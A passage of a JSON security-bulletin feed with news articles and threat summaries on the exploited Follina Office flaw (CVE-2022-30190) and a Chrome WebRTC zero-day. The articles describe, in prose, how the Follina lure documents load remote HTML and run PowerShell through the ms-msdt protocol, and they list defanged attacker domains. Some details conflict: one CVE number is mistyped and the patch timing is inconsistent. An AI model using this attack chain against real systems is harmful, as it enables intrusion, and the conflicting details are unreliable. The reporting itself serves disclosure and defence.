application.\u201d\n\nMicrosoft\u2019s workaround comes some six weeks after the vulnerability was apparently first identified. Researchers from [Shadow Chaser Group](<https://twitter.com/ShadowChasing1?ref_src=twsrc%5Egoogle%7Ctwcamp%5Eserp%7Ctwgr%5Eauthor>) noticed it on April 12 and patched by Microsoft in May.\n\nProofpoint says the malicious file used in the recruitment phishing campaigns, if downloaded, executes a script that can ultimately check for virtualized environment to abuse and \u201csteals information from local browsers, mail clients and file services, conducts machine recon and then zips it for exfil.\u201d\n\nProofpoint explained in a tweet, \u201cThe extensive reconnaissance conducted by [a] second Powershell script demonstrated an actor interested in a large variety of software on a target\u2019s computer.\u201d It is that behavior that raised concerns that the campaign had ties to a \u201cstate aligned nexus,\u201d researchers noted.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-06-07T12:45:00", "type": "threatpost", "title": "Follina Exploited by State-Sponsored Hackers", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30190"], "modified": "2022-06-07T12:45:00", "id": "THREATPOST:44942C746E9FFDC2F783FA19F0AFD348", "href": "https://threatpost.com/follina-exploited-by-state-sponsored-hackers/179890/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-06-23T12:27:08", "description": "Advanced persistent threat group Fancy Bear is behind a [phishing campaign](<https://threatpost.com/ukraine-russia-cyber-warzone-splits-cyber-underground/178693/>) that uses the specter of nuclear war to exploit a known one-click Microsoft flaw. The goal is to deliver malware that can steal credentials from the Chrome, Firefox and Edge browsers.\n\nThe attacks by the Russia-linked APT are tied the Russian and Ukraine war, according to researchers at Malwarebytes Threat Intelligence. They report that Fancy Bear is pushing malicious documents weaponized with the exploit for [Follina](<https://threatpost.com/microsoft-workaround-0day-attack/179776/>) ([CVE-2022-30190](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-30190>)), a known Microsoft one-click flaw, according to a [blog post](<https://blog.malwarebytes.com/threat-intelligence/2022/06/russias-apt28-uses-fear-of-nuclear-war-to-spread-follina-docs-in-ukraine/>) published this week.\n\nOn June 20, Malwarebytes researchers first observed the weaponized document, which downloads and executes a .Net stealer first [reported by Google](<https://blog.google/threat-analysis-group/update-on-cyber-activity-in-eastern-europe/>). Google\u2019s Threat Analysis Group (TAG) said Fancy Bear already has used this stealer to target users in the Ukraine.\n\nThe Computer Emergency Response Team of Ukraine (CERT-UA) [also independently discovered](<https://cert.gov.ua/article/341128>) the malicious document used by Fancy Bear in the recent phishing campaign, according to Malwarebytes.\n\n## **Bear on the Loose**\n\nCERT-UA [previously identified](<https://threatpost.com/cyberwar-ukraine-military/179421/>) Fancy Bear as one of the numerous APTs pummeling Ukraine with cyber-attacks in parallel with the invasion by Russian troops that began in late February. The group is believed to be operating on the behest of Russian intelligence to gather info that would be useful to the agency.\n\nIn the past Fancy Bear has been linked in attacks targeting elections [in the United States](<https://threatpost.com/fbi-dhs-report-links-fancy-bear-to-election-hacks/122802/>) and [Europe](<https://threatpost.com/microsoft-russias-fancy-bear-working-to-influence-eu-elections/142007/>), as well as [hacks against sporting and anti-doping agencies](<https://threatpost.com/cyberattacks-sporting-anti-doping-orgs-as-2020-olympics-loom/149634/>) related to the 2020 Olympic Games.\n\nResearchers first flagged Follina in April, but [only in May](<https://threatpost.com/zero-day-follina-bug-lays-older-microsoft-office-versions-open-to-attack/179756/>) was it officially identified as a zero-day, one-click exploit. Follina is associated with the Microsoft Support Diagnostic Tool (MSDT) and uses the ms-msdt protocol to load malicious code from Word or other Office documents when they\u2019re opened.\n\nThe bug is dangerous for a number of reasons\u2013not the least of which is its wide attack surface, as it basically affects anyone using Microsoft Office on all currently supported versions of Windows. If successfully exploited, attackers can gain user rights to effectively take over a system and install programs, view, change or delete data, or create new accounts.\n\nMicrosoft recently patched Follina in its [June Patch Tuesday](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-30190>) release but it remains [under active exploit](<https://threatpost.com/follina-exploited-by-state-sponsored-hackers/179890/>) by threat actors, including known APTs.\n\n**Threat of Nuclear Attack**\n\nFancy Bear\u2019s Follina campaign targets users with emails carrying a malicious RTF file called \u201cNuclear Terrorism A Very Real Threat\u201d in an attempt to prey on victims\u2019 fears that the invasion of Ukraine will escalate into a nuclear conflict, researchers said in the post. The content of the document is an [article](<https://www.atlanticcouncil.org/blogs/new-atlanticist/will-putin-use-nuclear-weapons-in-ukraine-our-experts-answer-three-burning-questions/>) from the international affairs group Atlantic Council that explores the possibility that Putin will use nuclear weapons in the war in Ukraine.\n\nThe malicious file uses a remote template embedded in the Document.xml.rels file to retrieve a remote HTML file from the URL http://kitten-268[.]frge[.]io/article[.]html. The HTML file then uses a JavaScript call to window.location.href to load and execute an encoded PowerShell script using the ms-msdt MSProtocol URI scheme, researchers said.\n\nThe PowerShell loads the final payload\u2013a variant of the .Net stealer previously identified by Google in other Fancy Bear campaigns in the Ukraine. While the oldest variant of the stealer used a fake error message pop-up to distract users from what it was doing, the variant used in the nuclear-themed campaign does not, researchers said.\n\nIn other functionality, the recently seen variant is \u201calmost identical\u201d to the earlier one, \u201cwith just a few minor refactors and some additional sleep commands,\u201d they added.\n\nAs with the previous variant, the stealer\u2019s main pupose is to steal data\u2014including website credentials such as username, password and URL\u2013from several popular browsers, including Google Chrome, Microsoft Edge and Firefox. The malware then uses the IMAP email protocol to exfiltrate data to its command-and-control server in the same way the earlier variant did but this time to a different domain, researchers said.\n\n\u201cThe old variant of this stealer connected to mail[.]sartoc.com (144.208.77.68) to exfiltrate data,\u201d they wrote. \u201cThe new variant uses the same method but a different domain, www.specialityllc[.]com. Interestingly both are located in Dubai.\u201d\n\nThe owners of the websites most likely have nothing to do with APT28, with the group simply taking advantage of abandoned or vulnerable sites, researchers added.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-06-23T12:21:33", "type": "threatpost", "title": "Fancy Bear Uses Nuke Threat Lure to Exploit 1-Click Bug", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30190"], "modified": "2022-06-23T12:21:33", "id": "THREATPOST:4365205CB12A4437E20A1077682B9CF8", "href": "https://threatpost.com/fancy-bear-nuke-threat-lure/180056/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-07-05T11:54:40", "description": "While people were celebrating the Fourth of July holiday in the United States, Google quietly rolled out a stable channel update for Chrome to patch an actively exploited zero-day vulnerability, the fourth such flaw the vendor has had to patch in its browser product so far this year.\n\nChrome 103 (103.0.5060.71) for Android and Version 103.0.5060.114 for Windows and Mac, outlined in [separate ](<https://chromereleases.googleblog.com/>)[blog posts](<https://chromereleases.googleblog.com/2022/07/extended-stable-channel-update-for.html>) published Monday, fix a heap buffer overflow flaw in WebRTC, the engine that gives the browser its real-time communications capability.\n\nThe vulnerability, tracked as [CVE-2022-2294](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2294>) and reported by Jan Vojtesek from the Avast Threat Intelligence team on July 1**, **is described as a buffer overflow, \u201cwhere the buffer that can be overwritten is allocated in the heap portion of memory,\u201d according to the vulnerability\u2019s [listing](<https://cwe.mitre.org/data/definitions/122.html>) on the Common Weakness Enumeration (CWE) website.\n\nAs per usual, Google did not reveal specific details about the bug, as it generally waits until most have updated to the patched version of the affected product. Indeed, updating is strongly recommended, as exploits for the vulnerability already exist in the wild, Google said.\n\nMoreover, with scant details revealed about the flaw\u2014a habit of Google\u2019s that many security researchers find frustrating\u2014at this point an update is really only way to defend against attacks exploiting the flaw. Fortunately, Google Chrome updates are pushed out without user intervention, so most users will be protected once patches are available.\n\nBuffer overflows generally lead to crashes or other attacks that make the affected program unavailable including putting the program into an infinite loop, according to the CWE listing. Attackers can take advantage of the situation by using the crash to execute arbitrary code typically outside of the scope of the program\u2019s security policy.\n\n\u201cBesides important user data, heap-based overflows can be used to overwrite function pointers that may be living in memory, pointing it to the attacker\u2019s code,\u201d according to the listing. \u201cEven in applications that do not explicitly use function pointers, the run-time will usually leave many in memory.\u201d\n\n## **Other Fixes**\n\nIn addition to fixing the zero-day buffer overflow flaw, the Chrome releases also patch a type confusion flaw in the V8 JavaScript engine tracked as [CVE-2022-2295](<https://security-tracker.debian.org/tracker/CVE-2022-2295>) and reported June 16 by researchers \u201cavaue\u201d and \u201cBuff3tts\u201d at S.S.L., according to the post.\n\nThis is the third such flaw in the open-source engine used by Chrome and Chromium-based web browsers patched this year alone. In March a separate type-confusion issue in the V8 JavaScript engine tracked as [CVE-2022-1096](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=2022-1096>) and under active attack [spurred a hasty patch](<https://threatpost.com/google-chrome-bug-actively-exploited-zero-day/179161/>) from Google.\n\nThen in April, the company patched [CVE-2022-1364](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=2022-1364>), another type confusion flaw affecting Chrome\u2019s use of V8 on which attackers already had pounced.\n\nAnother flaw patched in Monday\u2019s Chrome update is a use-after-free flaw in Chrome OS Shell reported by Khalil Zhani on May 19 and tracked as [CVE-2022-2296](<https://cve.report/CVE-2022-2296>), according to Google. All of the flaws patched in this week\u2019s update received a rating of high. The updates also includes several fixes from internal audits, fuzzing and other initiatives, Google said.\n\nPrior to patching the Chrome V8 JavaScript engine flaws in March and April, Google in February already had patched a zero-day use-after-free flaw in Chrome\u2019s Animation component tracked as [CVE-2022-0609](<https://nvd.nist.gov/vuln/detail/CVE-2022-0609>) that [was under active attack](<https://threatpost.com/google-chrome-zero-day-under-attack/178428/>).\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-07-05T11:54:21", "type": "threatpost", "title": "Google Patches Actively Exploited Chrome Bug", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-0609", "CVE-2022-1096", "CVE-2022-1364", "CVE-2022-2294", "CVE-2022-2295", "CVE-2022-2296"], "modified": "2022-07-05T11:54:21", "id": "THREATPOST:91A97EE2BD6933FEB9A07162BD4ED8B5", "href": "https://threatpost.com/actively-exploited-chrome-bug/180118/", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-06-02T16:46:30", "description": "Microsoft has released a workaround for [a zero-day flaw](<https://threatpost.com/zero-day-follina-bug-lays-older-microsoft-office-versions-open-to-attack/179756/>) that was initially flagged in April and that attackers already have used to target organizations in Russia and Tibet, researchers said.\n\nThe remote control execution (RCE) flaw, tracked as [CVE-2022-3019](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-30190>), is associated with the Microsoft Support Diagnostic Tool (MSDT), which, ironically, itself collects information about bugs in the company\u2019s products and reports to Microsoft Support.\n\n\u201cA remote code execution vulnerability exists when MSDT is called using the URL protocol from a calling application such as Word,\u201d Microsoft explained in [its guidance](<https://msrc-blog.microsoft.com/2022/05/30/guidance-for-cve-2022-30190-microsoft-support-diagnostic-tool-vulnerability/>) on the Microsoft Security Response Center. \u201cAn attacker who successfully exploits this vulnerability can run arbitrary code with the privileges of the calling application.\u201d\n\nMicrosoft\u2019s workaround comes some six weeks after the vulnerability was apparently first identified. Researchers from [Shadow Chaser Group](<https://twitter.com/ShadowChasing1?ref_src=twsrc%5Egoogle%7Ctwcamp%5Eserp%7Ctwgr%5Eauthor>) noticed it on April 12 in [a bachelor\u2019s thesis from August 2020](<https://benjamin-altpeter.de/doc/thesis-electron.pdf>)\u2014with attackers apparently targeting Russian users\u2013and reported to Microsoft on April 21, according to research firm Recorded Future\u2019s [The Record](<https://therecord.media/microsoft-releases-guidance-for-office-zero-day-used-to-target-orgs-in-russia-india-tibet/>).\n\nA Malwarebytes Threat Intelligence analyst also spotted the flaw back in April but could not fully identify it, the company said [in a post on Twitter](<https://twitter.com/MBThreatIntel/status/1531398009103142912?ref_src=twsrc%5Etfw%7Ctwcamp%5Etweetembed%7Ctwterm%5E1531398009103142912%7Ctwgr%5E%7Ctwcon%5Es1_&ref_url=https%3A%2F%2Ftherecord.media%2Fmicrosoft-releases-guidance-for-office-zero-day-used-to-target-orgs-in-russia-india-tibet%2F>) over the weekend, retweeting the [original post](<https://twitter.com/h2jazi/status/1513870903590936586>) about the vulnerability, also made on April 12, from [@h2jazi](<https://twitter.com/h2jazi>).\n\nWhen the flaw was reported, Microsoft didn\u2019t consider it an issue. It\u2019s clear now that the company was wrong, and the vulnerability again raised the attention of researchers at Japanese security vendor Nao Sec, who[ tweeted a fresh warning](<https://twitter.com/nao_sec/status/1530196847679401984>) about it over the weekend, noting that it was being used to target users in Belarus.\n\nIn analysis over the weekend noted security researcher Kevin Beaumont [dubbed the vulnerability](<https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e>) \u201cFollina,\u201d explaining the zero-day code references the Italy-based area code of Follina \u2013 0438.\n\n## **Current Workaround**\n\nWhile no patch yet exists for the flaw, Microsoft is recommending that affected users disable the MSDT URL to mitigate it for now. This \u201cprevents troubleshooters being launched as links including links throughout the operating system,\u201d the company wrote in their advisory.\n\nTo do this, users must follow these steps: Run \u201c:**Command Prompt**** as Administrator****\u201c**; Back up the registry key by executing the command \u201creg export HKEY_CLASSES_ROOT\\ms-msdt _filename_\u201c; and execute the command \u201creg delete HKEY_CLASSES_ROOT\\ms-msdt /f\u201d.\n\n\u201cTroubleshooters can still be accessed using the [Get Help application](<https://apps.microsoft.com/store/detail/get-help/9PKDZBMV1H3T?hl=en-us&gl=US>) and in system settings as other or additional troubleshooters,\u201d the company said.\n\nMoreover, if the calling application is an Office app then by default, Office opens the document from the internet in Protected View and Application Guard for Office, \u201cboth of which prevent the current attack,\u201d Microsoft said. However, Beaumont refuted that assurance in his analysis of the bug.\n\nMicrosoft also plans to update CVE-2022-3019 with further information but did not specify when it would do so, according to the advisory.\n\n## **Significant Risk**\n\nIn the meantime, the unpatched flaw poses a significant risk for a number of reasons, Beaumont and other researchers noted.\n\nOne is that it affects such a wide swathe of users, given that it exists in all currently supported Windows versions and can be exploited via Microsoft Office versions 2013 through Office 2019, Office 2021, Office 365, and Office ProPlus.\n\n\u201cEvery organization that is dealing with content, files and in particular Office documents, which is basically everyone in the globe, is currently exposed to this threat,\u201d Aviv Grafi, CTO and founder of security firm [Votiro](<https://votiro.com/>), wrote in an e-mail to Threatpost.\n\nAnother reason the flaw poses a major threat is its execution without action from end users, both Beaumont and Grafi said. Once the HTML is loaded from the calling application, an MSDT scheme is used to execute a PowerShell code to run a malicious payload, Grafi explained.\n\nSince the flaw is abusing the remote template feature in Microsoft Word, it is not dependent on a typical macro-based exploit path, which are common within Office-based attacks, Beaumont said.\n\n\u201cWhat makes this vulnerability so difficult to avoid is the fact that the end user does not have to enable macros for the code to execute, making it a \u2018zero-click\u2019 remote code execution technique used through MSDT,\u201d Grafi concurred.\n\n## **Under Active Attack**\n\nClaire Tills, senior research engineer for security firm Tenable, compared the flaw to last year\u2019s zero-click [MSHTML bug](<https://threatpost.com/microsoft-zero-day-rce-flaw-in-windows/169273/>)**, **tracked as [CVE-2021-40444](<https://nvd.nist.gov/vuln/detail/CVE-2021-40444>), which was pummeled by attackers, including the [Ryuk ransomware gang](<https://threatpost.com/microsoft-mshtml-ryuk-ransomware/174780/>).\n\n\u201cGiven the similarities between CVE-2022-30190 and CVE-2021-40444, and that researchers speculate other protocol handlers may also be vulnerable, we expect to see further developments and exploitation attempts of this issue,\u201d she wrote in an e-mail to Threatpost.\n\nIndeed, threat actors already have pounced on the vulnerability. On Monday, Proofpoint Threat Insight also [tweeted](<https://twitter.com/threatinsight/status/1531688214993555457>) that threat actors were using the flaw to target organizations in Tibet by impersonating the \u201cWomen Empowerments Desk\u201d of the Central Tibetan Administration.\n\nWhat\u2019s more, the workaround that Microsoft currently offers itself has issues and won\u2019t provide much of a fix in the long-term, especially with the bug under attack, Grafi said. He said the workaround is\u201dnot friendly for admins\u201d because it involves \u201cchanges in the Registry of the end user\u2019s endpoints.\u201d\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-06-01T10:38:37", "type": "threatpost", "title": "Microsoft Releases Workaround for \u2018One-Click\u2019 0Day Under Active Attack", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444", "CVE-2022-3019", "CVE-2022-30190"], "modified": "2022-06-01T10:38:37", "id": "THREATPOST:4C8D995307A845304CF691725B2352A2", "href": "https://threatpost.com/microsoft-workaround-0day-attack/179776/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "hivepro": [{"lastseen": "2022-11-10T14:16:09", "description": "Threat Level Attack Report For a detailed threat advisory, download the pdf file here Summary The recent incident is related to TA570, wherein the attackers exploited the Follina vulnerability (CVE-2022-30190) to compromise the Domain Controller and eventually gain access to confidential files.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-11-04T12:38:02", "type": "hivepro", "title": "Exploitation of Follina leads to takeover of domain controller", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30190"], "modified": "2022-11-04T12:38:02", "id": "HIVEPRO:04FABAE2F2B647B3488AA0025301D637", "href": "https://www.hivepro.com/exploitation-of-follina-leads-to-takeover-of-domain-controller/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-06-15T15:15:32", "description": "Threat Level Attack Report For a detailed advisory, download the pdf file here Summary Microsoft has issued a patch after almost 15 days for a zero-day vulnerability identified as CVE-2022-30190 after various proof-of-concept (POCs) indicating that it is actively exploited became public. Security researchers have also named this security flaw as Follina. A Chinese actor group, TA413 is been observed targeting organizations in Tibet with a malicious document with Follina", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-06-15T10:13:53", "type": "hivepro", "title": "Follina: A zero-day vulnerability in Microsoft Office", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30190"], "modified": "2022-06-15T10:13:53", "id": "HIVEPRO:B84508E062BD1F35232DF0CC7CDDC761", "href": "https://www.hivepro.com/follina-new-unpatched-zero-day-vulnerability-in-microsoft-office/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-08-04T20:00:29", "description": "Threat Level Attack Report For a detailed advisory, download the pdf file here Summary Candiru(Saito Tech) spyware used the recently fixed CVE-2022-2294 Chrome zero-day in assaults on journalists, with a substantial portion of the attacks taking place in Lebanon. This recently patched vulnerability in WebRTC is a heap-based buffer overflow. Its successful exploitation may result in code execution on the targeted device.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-07-28T06:06:37", "type": "hivepro", "title": "Spyware Group Candiru exploits Chrome Zero-Day to Target Middle East", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2022-2294"], "modified": "2022-07-28T06:06:37", "id": "HIVEPRO:2FBDBD20FF69ADDF5A541D1E5B3D0809", "href": "https://www.hivepro.com/spyware-group-candiru-exploits-chrome-zero-day-to-target-middle-east/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-06-03T14:58:43", "description": "For a detailed threat digest, download the pdf file here Summary HiveForce Labs recently made several significant discoveries related to cybersecurity threats. Over the past week, the fact that there were a total of ten attacks executed, taking advantage of four different vulnerabilities in various systems, and involving three different adversaries highlights the ever-present danger of cyber attacks. Interestingly, out of these three vulnerabilities are part of the known exploited vulnerability catalog by CISA. Moreover, HiveForce Labs also found that GoldenJackal APT was exploiting a one-year-old Follina vulnerability (CVE-2022-30190). Furthermore, we identified a new powershell-based backdoor malware PowerExchange that is being distributed through phishing emails targeting Microsoft Exchange servers. Apart from these threats, there was also a new ransomware strain named MichaelKors, has been targeting Linux and Vmware ESXi systems using tactic of "hypervisor jackpotting". All these attacks were observed to be on the rise, posing a significant threat to users all over the world. For a detailed threat digest, download the pdf file here", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2023-05-30T07:42:00", "type": "hivepro", "title": "Actors, Threats and Vulnerabilities 22 to 28 May 2023", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30190"], "modified": "2023-05-30T07:42:00", "id": "HIVEPRO:C7B595FEDAF36C429CA05AF1C5C3D818", "href": "https://www.hivepro.com/actors-threats-and-vulnerabilities-22-to-28-may-2023/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-08-05T22:10:09", "description": "Threat Level Attack Report For a detailed advisory, download the pdf file here Summary The unknown threat actor employs the Woody RAT to spear-phish Russian organizations. The malware was distributed via archive files and later switched to Microsoft Office documents leveraging the now-patched CVE-2022-30190 vulnerability.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-08-05T18:22:17", "type": "hivepro", "title": "Woody RAT leverages Follina to target Russia", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30190"], "modified": "2022-08-05T18:22:17", "id": "HIVEPRO:CA37C8D639BE8660B8996BB5FB4F3C0F", "href": "https://www.hivepro.com/woody-rat-leverages-follina-to-target-russia/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-06-18T15:55:34", "description": "For a detailed threat digest, download the pdf file here Summary HiveForce Labs recently made several significant discoveries related to cybersecurity threats. Over the past week, the fact that there were a total of seven attacks executed, taking advantage of five different vulnerabilities in various systems, and involving two different adversaries highlights the ever-present danger of cyber attacks. Interestingly, all five vulnerabilities are part of the known exploited vulnerability catalog by CISA, out of which four are zero-day. Moreover, HiveForce Labs also found that Asylum Ambuscade threat group was exploiting a one-year-old Follina vulnerability (CVE-2022-30190). Furthermore, a new malware software called MediaArena Browser Hijacker has been identified, which is being distributed through malvertising campaigns. In addition to these threats, there is also a zero-day vulnerability (CVE-2023-34362) associated with Lace Tempest, TA505, and Clop ransomware that 